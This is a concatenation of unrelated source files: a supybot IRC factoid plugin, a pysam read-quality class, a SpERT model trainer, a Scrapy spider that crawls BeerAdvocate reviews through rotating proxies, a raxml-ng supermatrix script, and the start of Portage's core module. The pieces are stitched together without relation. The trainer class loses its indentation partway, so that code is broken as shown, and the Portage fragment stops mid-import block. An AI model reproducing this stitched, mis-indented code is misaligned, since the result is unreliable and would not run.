        self._dispose()
    def _dispose(self):
        # None is the sentinel that tells the worker thread to exit.
        self.__jobs.put(None)
    def __objThread(self):
        # Worker loop: build the wrapped object, then drain jobs until the
        # shutdown sentinel arrives.
        self._wrapped = self.__makeWrapped()
        self.__wrapEvent.set()
        while True:
            job = self.__jobs.get()
            if job is None:
                logging.debug("Quitting job thread")
                return
            func, promise = job
            logging.debug("Processing job %r", func)
            try:
                promise.finish(func())
            except Exception, e:
                promise.errored(e)
    def __schedule(self, func, *args, **kwargs):
        # Queue a call for the worker thread; the Promise resolves with its
        # return value (or exception).
        p = Promise()
        logging.debug("Scheduling %r", func)
        self.__jobs.put((functools.partial(func, *args, **kwargs), p))
        return p
    def __getattr__(self, key):
        # Wait for the wrapped object to exist, then either hand back the
        # attribute directly (owner thread, or a non-callable value) or a
        # wrapper that schedules the call onto the worker thread.
        self.__wrapEvent.wait()
        val = getattr(self._wrapped, key)
        if threading.currentThread() != self.__thread and callable(val):
            @functools.wraps(val)
            def schedule(*args, **kwargs):
                return self.__schedule(val, *args, **kwargs)
            return schedule
        else:
            return val
def regexp(expr, item):
    """SQLite REGEXP implementation: True when ``expr`` matches ``item``."""
    compiled = re.compile(expr)
    logging.info("Matched %r against %r to get %r", expr, item, compiled)
    return compiled.search(item) is not None
class SQLiteWhatisDB(object):
    """Per-channel sqlite3 store of (pattern, reaction) pairs.

    Python 2 code (dict.itervalues). Each channel gets its own database
    file, created and schema-upgraded lazily on first access.
    """
    def __init__(self, filename):
        self.dbs = ircutils.IrcDict()
        self.filename = filename
    def close(self):
        # Commit and close every per-channel connection.
        for db in self.dbs.itervalues():
            db.commit()
            db.close()
    def _getDb(self, channel):
        """Return the channel's connection, creating/upgrading if needed."""
        if channel not in self.dbs:
            filename = plugins.makeChannelFilename(self.filename, channel)
            self.dbs[channel] = sqlite3.connect(filename)
            self.dbs[channel].text_factory = str
            c = self.dbs[channel].execute("PRAGMA user_version");
            version = c.fetchone()[0]
            self._upgradeDb(self.dbs[channel], version)
            # Expose Python regex matching to SQL as REGEXP(pattern, text).
            self.dbs[channel].create_function("REGEXP", 2, regexp)
        return self.dbs[channel]
    def _upgradeDb(self, db, current):
        """Apply schema migrations from version ``current`` upward."""
        if (current == 0):
            current=1
            db.execute("CREATE TABLE Reactions (pattern TEXT KEY, reaction TEXT KEY, person TEXT, frequency REAL)")
            db.execute("CREATE UNIQUE INDEX reactionPair ON Reactions (pattern, reaction)")
            db.execute("PRAGMA user_version=%i"%current)
            db.commit()
    def getReactions(self, channel, pattern):
        """Return all reactions stored for the exact ``pattern``, as dicts."""
        c = self._getDb(channel).cursor()
        c.execute("SELECT reaction, pattern, person, frequency FROM Reactions WHERE pattern = ? ORDER BY reaction", (pattern,))
        ret = []
        for reaction in c:
            ret.append({
                'reaction': reaction[0],
                'pattern': reaction[1],
                'person': reaction[2],
                'frequency': reaction[3]
            })
        return ret
    def produceReaction(self, channel, text):
        """Pick one stored reaction whose pattern regex-matches ``text``,
        randomly weighted by frequency; None when nothing matches."""
        c = self._getDb(channel).cursor()
        c.execute("SELECT reaction, pattern, person, frequency FROM Reactions WHERE REGEXP(pattern, ?) ORDER BY RANDOM() * frequency LIMIT 1", (text,))
        res = c.fetchone()
        if res:
            return {
                'reaction': res[0],
                'pattern': res[1],
                'person': res[2],
                'frequency': res[3]
            }
        return None
    def addReaction(self, channel, pattern, reaction, person=None, frequency=1):
        """Insert a pair; False when the (pattern, reaction) pair exists.

        NOTE(review): the insert is not explicitly committed here; it is
        flushed by close() or forgetReaction's commit — confirm intended.
        """
        if person is None:
            person = "instinct"
        c = self._getDb(channel).cursor()
        try:
            c.execute("INSERT OR ABORT INTO Reactions (pattern, reaction, person, frequency) VALUES (?, ?, ?, ?)", (pattern, reaction, person, frequency))
            return True
        except:
            return False
    def forgetReaction(self, channel, pattern, reaction):
        """Delete an exact (pattern, reaction) pair; True when a row was removed."""
        c = self._getDb(channel).cursor()
        res = c.execute("DELETE FROM Reactions WHERE pattern = ? AND reaction = ?",
            (pattern,reaction))
        self._getDb(channel).commit()
        return bool(res.rowcount > 0)
# Channel-aware DB factory registered with supybot's plugin framework.
WhatisDB = plugins.DB('Whatis', {'sqlite': SQLiteWhatisDB})
class Whatis(callbacks.PluginRegexp):
    """Remembers '<pattern> is <reaction>' factoids per channel and replays
    a matching reaction (optionally tagged <action>/<reply>/<markov>) when
    a channel message matches a stored pattern."""
    addressedRegexps = ['doRemember']
    threaded = False
    def __init__(self, irc):
        self.__jobs = Queue.Queue()
        self.__parent = super(Whatis, self)
        self.__parent.__init__(irc)
        # All DB access is funneled through a single worker thread; calls
        # through the facade return Promises (use .result()).
        self.db = ThreadProtectionFacade(WhatisDB)
        # Last reaction produced per channel, for 'explain' and 'forget'.
        self.explanations = ircutils.IrcDict()
    def die(self):
        self.__parent.die()
        self.db.close()
        self.db._dispose()
    def explain(self, irc, msg, args, channel, text):
        """[<channel>] [<text>]
        Returns the definition for <text> from the database for <channel>. If
        text is not given, it returns the definition for the last reply.
        """
        if (not text):
            if (channel in self.explanations.keys()):
                explanation = self.explanations[channel]
                # Bug fix: 'explanations' stores the reaction dicts built in
                # _reply (keys: reaction/pattern/person/frequency), not
                # tuples — indexing with [0] raised KeyError — and a literal
                # '%' must be doubled inside a %-format string.
                irc.reply("%(person)s taught me that '%(pattern)s' was '%(reaction)s' %(frequency)f%% of the time" % explanation)
            else:
                irc.reply("I haven't said anything yet.")
        else:
            reactions = self.db.getReactions(channel, text).result()
            if len(reactions) == 0:
                irc.reply("I have no idea what you are talking about.")
            else:
                reactions = map(lambda r: "%(person)s: P('%(reaction)s')=%(frequency).1f"%r, reactions)
                irc.reply(("'%s' is "%(text))+', '.join(reactions))
    explain = wrap(explain, ['channeldb', optional('text')])
    def forget(self, irc, msg, args, channel, text):
        """[<channel>] [that] <text> OR [that] <pattern> is <text>
        Asks me to forget the latest thing I said about <text>, if I can
        remember what it was or you tell me. The 'that' is optional syntactic
        sugar.
        """
        text = re.match("(?:that )?(.+)", text).groups()[0]
        definitionSplit = re.match("(.+)\s+is\s+(.+)", text)
        if definitionSplit:
            pattern, reaction = definitionSplit.groups()
            if self.db.forgetReaction(channel, pattern, reaction).result():
                irc.replySuccess()
                return
        if channel in self.explanations and self.explanations[channel]['pattern'] == text:
            # Bug fix: the facade returns a Promise, which is always truthy;
            # .result() is required to read the actual boolean.
            if self.db.forgetReaction(channel, text, self.explanations[channel]['reaction']).result():
                irc.replySuccess()
                return
        reactions = self.db.getReactions(channel, text).result()
        if len(reactions) == 1:
            # Bug fix: .result() added here as well (see above).
            if self.db.forgetReaction(channel, text, reactions[0]['reaction']).result():
                irc.replySuccess()
        elif len(reactions) == 0:
            # Bug fix: this branch tested '== 1' again and was unreachable.
            irc.reply("I don't remember anything about that.")
        else:
            irc.reply("You'll have to be more specific about what I'm forgetting.")
    forget = wrap(forget, ['channeldb', 'text'])
    def doRemember(self, irc, msg, match):
        r'(.+)\s+is\s+(.+)'
        # (The raw-string "docstring" above is the trigger regex used by
        # PluginRegexp via addressedRegexps — do not replace it.)
        if not callbacks.addressed(irc.nick, msg):
            return
        (pattern, reaction) = match.groups()
        self.log.info("Learning that '%s' means '%s'!", pattern, reaction)
        channel = plugins.getChannel(msg.args[0])
        msg.tag("repliedTo")
        if self.db.addReaction(channel, pattern, reaction).result():
            existing = self.db.getReactions(channel, pattern).result()
            if len(existing) > 1:
                irc.reply("I now have %d meanings for %s."%(len(existing), pattern))
            else:
                irc.replySuccess()
        else:
            irc.reply("I already knew that.")
    def doPrivmsg(self, irc, msg):
        # React to ordinary channel traffic that no command already answered.
        if (irc.isChannel(msg.args[0])):
            channel = plugins.getChannel(msg.args[0])
            if (not msg.tagged("repliedTo")):
                self._reply(channel, irc, msg, False)
    @staticmethod
    def extractTag(text):
        """Split a leading '<tag>' off ``text``; returns (tag or None, rest)."""
        matches = re.match("(<.+>)?(.+)", text)
        if matches:
            tag, rest = matches.groups()
            # Bug fix: the optional tag group is None for untagged text, and
            # the original unconditionally sliced it (None[1:-1] TypeError).
            if tag:
                return (tag[1:-1], rest)
            return (None, rest)
        return (None, text)
    def _reply(self, channel, irc, msg, direct):
        """Look up a reaction for the message text and send it; True if sent."""
        reaction = self.db.produceReaction(channel, ' '.join(msg.args[1:])).result()
        self.log.info("Got reaction for %r: %r", ' '.join(msg.args[1:]), reaction)
        if (reaction):
            self.explanations[channel] = reaction
            tag, text = self.extractTag(reaction['reaction'])
            text = text.replace('$nick', msg.nick)
            if tag == 'action':
                irc.reply(text, action=True)
            elif tag == 'reply':
                irc.reply(text, prefixNick=direct)
            elif tag == 'markov':
                # Delegate to the Markov plugin, capturing its reply quietly.
                proxy = QuietNestedCommandsIrcProxy(irc, msg,
                    ['markov', text])
                if proxy.savedReply:
                    irc.reply(proxy.savedReply, prefixNick=direct)
            else:
                irc.reply("%(pattern)s is %(reaction)s" % reaction, prefixNick=direct)
            return True
        else:
            return False
Class = Whatis
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
#!/usr/bin/python3
'''
'''
import pysam
from globals import *
#Assess read based on quality, alignment, sequence complexity,
class ShortReadAssessment(object):
    """Quality screens for a single aligned short read: mean phred quality,
    sequence complexity, read length, and alignment confidence."""

    def __init__(self, samread):
        self.alignedread_ = samread
        quals = samread.query_qualities
        self.meanphread_ = sum(quals) / len(quals)
        seq = samread.query_sequence
        self.readlength_ = len(seq)
        # Count overlapping 'AT'/'GC' dinucleotides plus single-base totals.
        at_pairs = 0
        gc_pairs = 0
        for pos in range(self.readlength_ - 1):
            pair = seq[pos:pos + 2]
            if pair == "AT":
                at_pairs += 1
            elif pair == "GC":
                gc_pairs += 1
        self.nuccounts_ = {
            "AT": at_pairs,
            "GC": gc_pairs,
            "A": seq.count("A"),
            "T": seq.count("T"),
            "C": seq.count("C"),
            "G": seq.count("G"),
        }

    def is_low_complexity(self):
        """True when the read is dominated by GC/AT repeats or a single base."""
        length = self.readlength_
        counts = self.nuccounts_
        if counts["GC"] / length >= 0.89:
            return True
        if counts["AT"] / length >= 0.87:
            return True
        return any(counts[base] / length >= 0.6 for base in "ATGC")

    def is_low_length(self, minlen=40):
        """True when the read is shorter than ``minlen`` bases."""
        return self.readlength_ < minlen

    def is_low_confidence_alignment(self):
        """True when the (soft-clip-trimmed) alignment mismatches too much.

        A read fails when it has more than 10 mismatch bases (hard rule) or
        when mismatches exceed 10% of the considered CIGAR length.
        """
        cigar = self.alignedread_.cigartuples
        # Drop short (<=15 bp) soft clips at either end before measuring.
        if cigar[0][0] == 4 and cigar[0][1] <= 15:
            cigar = cigar[1:]
        if cigar[-1][0] == 4 and cigar[-1][1] <= 15:
            cigar = cigar[:-1]
        total = 0
        mismatch = 0
        for op, span in cigar:
            total += span
            if op == 8:  # CIGAR 'X': sequence mismatch
                mismatch += span
        if mismatch > 10:  # hard rule, 10 mismatches
            return True
        return mismatch / total > 0.1  # 10 percent of read is mismatching

    def is_low_phread(self, minp=20):
        """True when the mean phred quality is at or below ``minp``."""
        return self.meanphread_ <= minp
|
import argparse
import datetime
import logging
import os
import sys
from typing import List, Dict, Tuple
import torch
from torch.nn import DataParallel
from torch.optim import Optimizer
from transformers import PreTrainedModel
from transformers import PreTrainedTokenizer
from spert import util
from spert.opt import tensorboardX
SCRIPT_PATH = os.path.dirname(os.path.realpath(__file__))
class BaseTrainer:
""" Trainer base class with common methods """
def __init__(self, args: argparse.Namespace):
    """Set up per-run logging (file + console + optional tensorboard),
    log/save directories, CUDA device selection, and RNG seeding."""
    self.args = args
    self._debug = self.args.debug
    # logging: one timestamped run directory per invocation
    name = str(datetime.datetime.now()).replace(' ', '_')
    self._log_path = os.path.join(self.args.log_path, self.args.label, name)
    util.create_directories_dir(self._log_path)
    # save_path is optional (e.g. evaluation-only runs don't checkpoint)
    if hasattr(args, 'save_path'):
        self._save_path = os.path.join(self.args.save_path, self.args.label, name)
        util.create_directories_dir(self._save_path)
    self._log_paths = dict()
    # file + console logging
    log_formatter = logging.Formatter("%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s")
    self._logger = logging.getLogger()
    util.reset_logger(self._logger)
    file_handler = logging.FileHandler(os.path.join(self._log_path, 'all.log'))
    file_handler.setFormatter(log_formatter)
    self._logger.addHandler(file_handler)
    console_handler = logging.StreamHandler(sys.stdout)
    console_handler.setFormatter(log_formatter)
    self._logger.addHandler(console_handler)
    if self._debug:
        self._logger.setLevel(logging.DEBUG)
    else:
        self._logger.setLevel(logging.INFO)
    # tensorboard summary (tensorboardX is an optional dependency)
    self._summary_writer = tensorboardX.SummaryWriter(self._log_path) if tensorboardX is not None else None
    self._best_results = dict()
    self._log_arguments()
    # CUDA devices (honor the --cpu override)
    self._device = torch.device("cuda" if torch.cuda.is_available() and not args.cpu else "cpu")
    self._gpu_count = torch.cuda.device_count()
    # set seed for reproducibility
    if args.seed is not None:
        util.set_seed(args.seed)
def _add_dataset_logging(self, *labels, data: Dict[str, List[str]]):
for label in labels:
dic = dict()
for key, columns in data.items():
path = os.path.join(self._log_path, '%s_%s.csv' % (key, label))
util.create_csv(path, *columns)
dic[key] = path
self._log_paths[label] = dic
self._best_results[label] = 0
def _log_arguments(self):
util.save_dict(self._log_path, self.args, 'args')
if self._summary_writer is not None:
util.summarize_dict(self._summary_writer, self.args, 'args')
def _log_tensorboard(self, dataset_label: str, data_label: str, data: object, iteration: int):
if self._summary_writer is not None:
self._summary_writer.add_scalar('data/%s/%s' % (dataset_label, data_label), data, iteration)
def _log_csv(self, dataset_label: str, data_label: str, *data: Tuple[object]):
logs = self._log_paths[dataset_label]
util.append_csv(logs[data_label], *data)
def _save_best(self, model: PreTrainedModel, tokenizer: PreTrainedTokenizer, optimizer: Optimizer,
accuracy: float, iteration: int, label: str, extra=None):
if accuracy > self._best_results[label]:
self._logger.info("[%s] Best model in iteration %s: %s%% accuracy" % (label, iteration, accuracy))
self._save_model(self._save_path, model, tokenizer, iteration,
optimizer=optimizer if self.args.save_optimizer else None,
save_as_best=True, name='model_%s' % label, extra=extra)
self._best_results[label] = accuracy
def _save_model(self, save_path: str, model: PreTrainedModel, tokenizer: PreTrainedTokenizer,
iteration: int, optimizer: Optimizer = None, save_as_best: bool = False,
extra: dict = None, include_iteration: int = True, name: str = 'model'):
extra_state = dict(iteration=iteration)
if optimizer:
extra_state['optimizer'] = optimizer.state_dict()
if extra:
extra_state.update(extra)
if save_as_best:
dir_path = os.path.join(save_path, '%s_best' % name)
else:
dir_name = '%s_%s' % (name, iteration) if include_iteration else name
dir_path = os.path.join(save_path, dir_name)
util.create_directories_dir(dir_path)
# save model
if isinstance(model, DataParallel):
model.module.save_pretrained(dir_path)
else:
model.save_pretrained(dir_path)
# save vocabulary
tokenizer.save_pretrained(dir_path)
# save extra
state_path = os.path.join(dir_path, 'extra.state')
torch.save(extra_state, state_path)
def _get_lr(self, optimizer):
lrs = []
for group in optimizer.param_groups:
lr_scheduled = group['lr']
lrs.append(lr_scheduled)
return lrs
def _close_summary_writer(self):
if self._summary_writer is not None:
self._summary_writer.close()
|
from scrapy import Spider, Request
from beer_advocate.items import BeerRatingItem
from beer_advocate.masking_utilities import *
from lxml.html import fromstring
import pandas as pd
import numpy as np
import re, os, requests
import datetime as dt
class BABeerReviewsSpider(Spider):
    """Crawl BeerAdvocate beer pages and yield one BeerRatingItem per review.

    Flow: parse() loads the beer list from disk and schedules one request per
    beer through a randomly picked proxy; parse_beer_review_start_page()
    paginates the review listing; parse_beer_review_page() extracts the
    per-review ratings and text.
    """
    name = "beer_reviews_spider"
    # NOTE(review): scrapy's offsite filtering reads `allowed_domains`, not
    # `allowed_urls` -- as written this attribute likely has no effect. Confirm.
    allowed_urls = ["https://www.beeradvocate.com/"]
    start_urls = ["https://www.beeradvocate.com/beer/"]

    # get list of free proxies and use only elite proxies
    def parse(self, response):
        """Read the beer list, maintain a fresh proxy pool, request each beer."""
        # set base url for all brewery profiles
        base_url = "https://www.beeradvocate.com"
        # import list of breweries to collect data from
        beer_list_filename = "./runs/20180803/data_files/beer_list_20180803.txt"
        beer_list = pd.read_csv(beer_list_filename, sep='\t')
        # filter out beers that have no ratings
        beer_list = beer_list.loc[beer_list['num_ratings'] >= 200,]
        # narrow down list to test
        #beer_list = beer_list[1:25]
        #beer_list = beer_list.loc[(beer_list['num_ratings'] >= 200) & ((beer_list['num_ratings'] < 1000)),]
        beer_list = beer_list.loc[(beer_list['beer_id'] == 72363),]
        # get list of user_agents. for now, only use first
        user_agent_list = get_user_agent_list()
        user_agent = user_agent_list[0]
        # generate proxy list and associated parameters
        # pass in test url and user agent to return only working proxies
        proxy_list = get_proxy_list(test_url=base_url, user_agent=user_agent) # get list of proxies
        # set parameters for monitoring proxies
        prxy_lst_updt = dt.datetime.now() # set time of last proxy list update
        prxy_updt_interval = 60 # proxy refresh interval in minutes
        num_proxies = len(proxy_list) # get number of proxies
        dt_format = '%m/%d/%Y %H:%M:%S:%f'
        # used for debugging purposes
        print('Proxy list generated at: ' + prxy_lst_updt.strftime(dt_format) + '; length: ' + str(len(proxy_list)))
        for beer in beer_list.iterrows():
            # unpack parameters of beer (iterrows yields (index, row))
            beer = beer[1]
            brewery_id = beer[0]
            beer_id = beer[1]
            brewery_name = beer[2]
            beer_name = beer[3]
            beer_url = base_url + beer[4]
            # check how much time has passed since proxies were refreshed
            proxy_age_check_now = dt.datetime.now()
            time_since_prxy_updt = proxy_age_check_now - prxy_lst_updt
            print('last update: ' + prxy_lst_updt.strftime(dt_format) + '; now: ' + proxy_age_check_now.strftime(dt_format) + '; time elapsed: ' + str(time_since_prxy_updt.total_seconds()))
            # refresh list if threshold has passed
            if time_since_prxy_updt.total_seconds() > prxy_updt_interval*60:
                # fix: validate refreshed proxies the same way as the initial
                # list (the original refresh dropped test_url/user_agent)
                proxy_list = get_proxy_list(test_url=base_url, user_agent=user_agent) # get list of proxies
                prxy_lst_updt = dt.datetime.now() # set time of last proxy list update
                num_proxies = len(proxy_list)
                print('Proxy list generated at: ' + prxy_lst_updt.strftime(dt_format) + '; length: ' + str(len(proxy_list)))
            # generate random proxy
            np.random.seed()
            r = np.random.randint(low=0,high=num_proxies)
            proxy_to_use = proxy_list.iloc[r,0]
            proxy_code = proxy_list.iloc[r,1]
            proxy_last_checked = proxy_list.iloc[r,2]
            # print for debugging purposes
            print('Proxy attempted||Review Start Page||' + str(brewery_id) + '||' + str(beer_id) + '||' + brewery_name + '||' + beer_name + '||' + '||' + proxy_to_use + '||' + proxy_code + '||' + proxy_last_checked)
            yield Request(url=beer_url, headers={'User-Agent': user_agent}, meta={'user_agent': user_agent, 'brewery_id': brewery_id, 'brewery_name': brewery_name, 'beer_id': beer_id, 'beer_name': beer_name, 'beer_url': beer_url, 'proxy': proxy_to_use, 'proxy_used': proxy_to_use}, callback=self.parse_beer_review_start_page)

    def parse_beer_review_start_page(self, response):
        """From the beer's first page, derive and request all review pages."""
        # unpack meta data
        brewery_id = response.meta['brewery_id']
        beer_id = response.meta['beer_id']
        brewery_name = response.meta['brewery_name']
        beer_name = response.meta['beer_name']
        beer_url = response.meta['beer_url']
        proxy = response.meta['proxy_used']
        user_agent = response.meta['user_agent']
        # print success msg for debugging purposes
        print('Proxy successful||Review Start Page||' + str(brewery_id) + '||' + str(beer_id) + '||' + brewery_name + '||' + beer_name + '||' + '||' + proxy)
        # find number of ratings and generate one url per 25-review page
        # (when num_ratings is a multiple of 25 this requests one extra,
        # empty page -- harmless)
        num_ratings = int(response.xpath('//*[@id="ba-content"]/div[13]/b[1]/text()').extract_first().split(': ')[1].replace(',',''))
        num_per_page = 25
        num_pages = (num_ratings // num_per_page) + 1
        beer_ratings_urls = list(map(lambda i: beer_url + "?view=beer&sort=&start=" + str(num_per_page*i), range(0,num_pages)))
        #print(beer_ratings_urls[0:10])
        #beer_ratings_urls = [beer_url + "?view=beer&sort=&start=" + str(13950)]
        for url in beer_ratings_urls:
            start_num = str(url.split('start=')[1])
            # print for debugging purposes
            print('Proxy attempted||Review Page||' + str(brewery_id) + '||' + str(beer_id) + '||' + brewery_name + '||' + beer_name + '||' + start_num + '||' + proxy)
            yield Request(url=url, headers={'User-Agent': user_agent}, meta={'brewery_id': brewery_id, 'brewery_name': brewery_name, 'beer_id': beer_id, 'beer_name': beer_name, 'start_num': start_num, \
                          'proxy': proxy, 'proxy_used': proxy}, callback=self.parse_beer_review_page)

    def parse_beer_review_page(self, response):
        """Extract every review on one listing page into BeerRatingItems."""
        # unpack meta data
        brewery_id = response.meta['brewery_id']
        beer_id = response.meta['beer_id']
        brewery_name = response.meta['brewery_name']
        beer_name = response.meta['beer_name']
        start_num = response.meta['start_num']
        proxy = response.meta['proxy_used']
        # print success msg for debugging purposes
        print('Proxy successful||Review Page||' + str(brewery_id) + '||' + str(beer_id) + '||' + brewery_name + '||' + beer_name + '||' + start_num + '||' + proxy)
        # get container for all reviews on page
        main_box = response.xpath('//*[@id="rating_fullview"]')
        reviews = main_box.xpath('div[@id="rating_fullview_container"]')
        for review in reviews:
            rating_agg = review.xpath('div[@id="rating_fullview_content_2"]/span[@class="BAscore_norm"]/text()').extract_first()
            component_ratings = review.xpath('div[@id="rating_fullview_content_2"]/span[@class="muted"]/text()')
            # check if component ratings exist
            # NOTE(review): xpath() returns a (possibly empty) SelectorList,
            # never None, so the empty case is really handled by the `== []`
            # branch below; this guard is kept (fixed to `is None`) for safety
            if component_ratings is None:
                rating_look = ''
                rating_smell = ''
                rating_taste = ''
                rating_feel = ''
                rating_overall = ''
            else:
                # filter out element with number of characters of the review
                component_ratings = list(map(lambda s: s.replace(',',''), component_ratings.extract()))
                component_ratings = list(filter(lambda s: re.search(r'^\d+ characters$', s) == None, component_ratings))
                if component_ratings == []:
                    rating_look = ''
                    rating_smell = ''
                    rating_taste = ''
                    rating_feel = ''
                    rating_overall = ''
                else:
                    # "look: x | smell: y | ..." -> [['look','x'], ['smell','y'], ...]
                    component_ratings = list(map(lambda s: s.replace(' ','').split(':'),component_ratings[0].split('|')))
                    rating_look = component_ratings[0][1]
                    rating_smell = component_ratings[1][1]
                    rating_taste = component_ratings[2][1]
                    rating_feel = component_ratings[3][1]
                    rating_overall = component_ratings[4][1]
            review_section = review.xpath('div[@id="rating_fullview_content_2"]/text()')
            # check if review exists
            if len(review_section) > 1:
                review_text = review_section.extract()
                review_text = ''.join(list(filter(lambda s: s.find('rDev')==-1, review_text)))
                review_text = review_text.replace('\n','_@@_')
            else:
                review_text = ''
            user_name = review.xpath('div[@id="rating_fullview_content_2"]/div//a/text()')[0].extract()
            user_url = review.xpath('div[@id="rating_fullview_content_2"]/div//a/@href')[0].extract()
            item = BeerRatingItem()
            item['brewery_name'] = brewery_name
            item['brewery_id'] = str(brewery_id)
            item['beer_name'] = beer_name
            item['beer_id'] = str(beer_id)
            item['user_name'] = user_name
            item['user_url'] = user_url
            item['rating_agg'] = rating_agg
            item['rating_look'] = rating_look
            item['rating_smell'] = rating_smell
            item['rating_taste'] = rating_taste
            item['rating_feel'] = rating_feel
            item['rating_overall'] = rating_overall
            item['review'] = review_text
            yield item
|
import os
import sys
import subprocess
import shutil
import fam
sys.path.insert(0, 'scripts')
sys.path.insert(0, 'tools/mappings')
import experiments as exp
import time
import saved_metrics
import ete3
import get_dico
import random
import species_analyze
import time
def build_supermatrix(datadir, subst_model, supermatrix_path, partition_path, concatenation_mode, msa_format = "phylip_relaxed"):
  """Concatenate per-family alignments into one supermatrix + partition file.

  Writes the concatenated alignment to *supermatrix_path* (in *msa_format*)
  and a per-partition model/range file to *partition_path*.

  concatenation_mode:
    - "single": skip families where any species has more than one gene
    - "max":    keep sampling one gene per species until genes run out
    - otherwise: sample a single partition per family

  Returns *offset*, which ends up one past the last written site (1-based).
  """
  print("build supermatrix")
  all_species = ete3.Tree(fam.get_species_tree(datadir), 1).get_leaf_names()
  partition_writer = open(partition_path, "w")
  offset = 1  # 1-based start column of the next partition
  single = (concatenation_mode == "single")
  use_all_genes = (concatenation_mode == "max")
  treated = 0
  to_treat = len(fam.get_families_list(datadir))
  # per-species list of per-partition sequences, joined at the end
  columns = {}
  for species in all_species:
    columns[species] = []
  for family in fam.get_families_list(datadir):
    if (treated % 1000 == 0):
      print("Building supermatrix: " + str(treated) + "/" + str(to_treat))
    treated += 1
    seqgroup = ete3.SeqGroup(fam.get_alignment(datadir, family))
    seq_len = len(seqgroup.get_entries()[0][1])
    gaps = "-" * seq_len  # all-gap row for species absent from this family
    species_to_genes = get_dico.get_species_to_genes_family(datadir, family)
    species_to_sample = {}  # NOTE(review): unused -- left in place
    skip_family = False
    for species in all_species:
      if (species in species_to_genes):
        if (single and len(species_to_genes[species]) > 1):
          skip_family = True
        # randomize which gene copy gets consumed first
        random.shuffle(species_to_genes[species])
    if (skip_family):
      continue
    print("Start working on family " + family)
    # NOTE(review): partitions stop once 3 or fewer species still have unused
    # genes -- confirm this threshold is intended (avoids tiny partitions?)
    while (len(species_to_genes) > 3):
      for species in all_species:
        seq = gaps
        if (species in species_to_genes):
          # consume the last (shuffled) gene of this species
          seq = seqgroup.get_seq(species_to_genes[species][-1])
          species_to_genes[species].pop()
          if (len(species_to_genes[species]) == 0):
            del species_to_genes[species]
        columns[species].append(seq)
      partition_writer.write(subst_model + ", " + family + " = ")
      partition_writer.write(str(offset) + "-" + str(offset + seq_len - 1))
      partition_writer.write("\n")
      offset += seq_len
      if (not use_all_genes):
        break
  partition_writer.close()
  print("Writing the supermatrix...")
  supermatrix = ete3.SeqGroup()
  print("Number of partitions:" + str(len(columns[all_species[0]])))
  # NOTE(review): offset is one past the last site at this point
  print("Number of sites: " + str(offset))
  for species in all_species:
    print("Add " + species + " to supermatrix...")
    supermatrix.set_seq(species, "".join(columns[species]))
  supermatrix.write(msa_format, supermatrix_path)
  print("End of writing the supermatrix")
  return offset
def run_raxml(subst_model, cores, run_dir, supermatrix_path, partition_path):
  """Run a raxml-ng tree search (--search1) on the supermatrix via mpiexec.

  Launches *cores* MPI ranks with one thread each, writing all output under
  run_dir/concatenation.*, and blocks until the search finishes.
  Fixes: removed an unused, leaked os.devnull handle; corrected the
  "un raxml" debug message.
  """
  print("run raxml")
  command = []
  command.append("mpiexec")
  command.append("-np")
  command.append(str(cores))
  command.append(exp.raxml_exec)
  command.append("--search1")
  command.append("--msa")
  command.append(supermatrix_path)
  command.append("--model")
  # the partition file carries the per-partition substitution model
  #command.append(subst_model)
  command.append(partition_path)
  command.append("--prefix")
  command.append(os.path.join(run_dir, "concatenation"))
  command.append("--seed")
  command.append("40")
  command.append("--force")
  command.append("--threads")
  command.append("1")
  print("running " + " ".join(command))
  process = subprocess.Popen(command, stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  stdout, stderr = process.communicate()
def run_concatenation(datadir, concatenation_mode, subst_model, cores, additional_arguments = None):
  """Build the supermatrix, infer a species tree with raxml-ng, save results.

  :param concatenation_mode: "min", "max" or "single" (see build_supermatrix)
  :param cores: upper bound on MPI ranks; scaled down for small matrices
  :param additional_arguments: optional flags; "--continue" reuses an
    existing run directory (default changed from a mutable ``[]`` to None)
  """
  if additional_arguments is None:
    additional_arguments = []
  from_scratch = "--continue" not in additional_arguments
  run_name = "concatenation-" + concatenation_mode
  run_dir = fam.get_run_dir(datadir, subst_model, run_name)
  supermatrix_path = os.path.join(run_dir, "supermatrix.fasta")
  partition_path = os.path.join(run_dir, "supermatrix.part")
  if (from_scratch):
    shutil.rmtree(run_dir, True)
    os.makedirs(run_dir)
  sites = build_supermatrix(datadir, subst_model, supermatrix_path, partition_path, concatenation_mode)
  # one rank per ~500 sites, but never 0 ranks (mpiexec -np 0 would fail)
  cores = max(1, min(cores, sites // 500))
  start = time.time()
  run_raxml(subst_model, cores, run_dir, supermatrix_path, partition_path)
  time1 = (time.time() - start)
  saved_metrics.save_metrics(datadir, fam.get_run_name(run_name, subst_model), time1, "runtimes")
  raxml_tree = os.path.join(run_dir, "concatenation.raxml.bestTree")
  dest = fam.get_species_tree(datadir, subst_model, run_name)
  shutil.copy(raxml_tree, dest)
if __name__ == "__main__":
  # CLI entry point: datadir concatenation_mode subst_model cores [extra...]
  min_args_number = 5
  if (len(sys.argv) < min_args_number):
    print("syntax: python run_concatenation.py datadir concatenation_mode subst_model cores")
    print("concatenation modes can be: ")
    print("- min: randomly take ONE gene from each family and each species")
    print("- max: apply min, remove the selected genes, and restart until there is not gene left")
    print("- single: only take single-copy gene families")
    sys.exit(1)
  datadir = sys.argv[1]
  concatenation_mode = sys.argv[2]
  subst_model = sys.argv[3]
  cores = int(sys.argv[4])
  additional_arguments = sys.argv[min_args_number:]
  # explicit validation instead of assert (asserts are stripped under -O)
  if concatenation_mode not in ["min", "max", "single"]:
    print("Invalid concatenation mode: " + concatenation_mode)
    sys.exit(1)
  run_concatenation(datadir, concatenation_mode, subst_model, cores, additional_arguments)
  species_analyze.analyze(datadir)
|
# portage.py -- core Portage functionality
# Copyright 1998-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
VERSION="2.1.11.31"
# ===========================================================================
# START OF IMPORTS -- START OF IMPORTS -- START OF IMPORTS -- START OF IMPORT
# ===========================================================================
try:
import sys
import errno
if not hasattr(errno, 'ESTALE'):
# ESTALE may not be defined on some systems, such as interix.
errno.ESTALE = -1
import re
import types
import platform
# Temporarily delete these imports, to ensure that only the
# wrapped versions are imported by portage internals.
import os
del os
import shutil
del shutil
except ImportError as e:
sys.stderr.write("\n\n")
sys.stderr.write("!!! Failed to complete python imports. These are internal modules for\n")
sys.stderr.write("!!! python and failure here indicates that you have a problem with python\n")
sys.stderr.write("!!! itself and thus portage is not able to continue processing.\n\n")
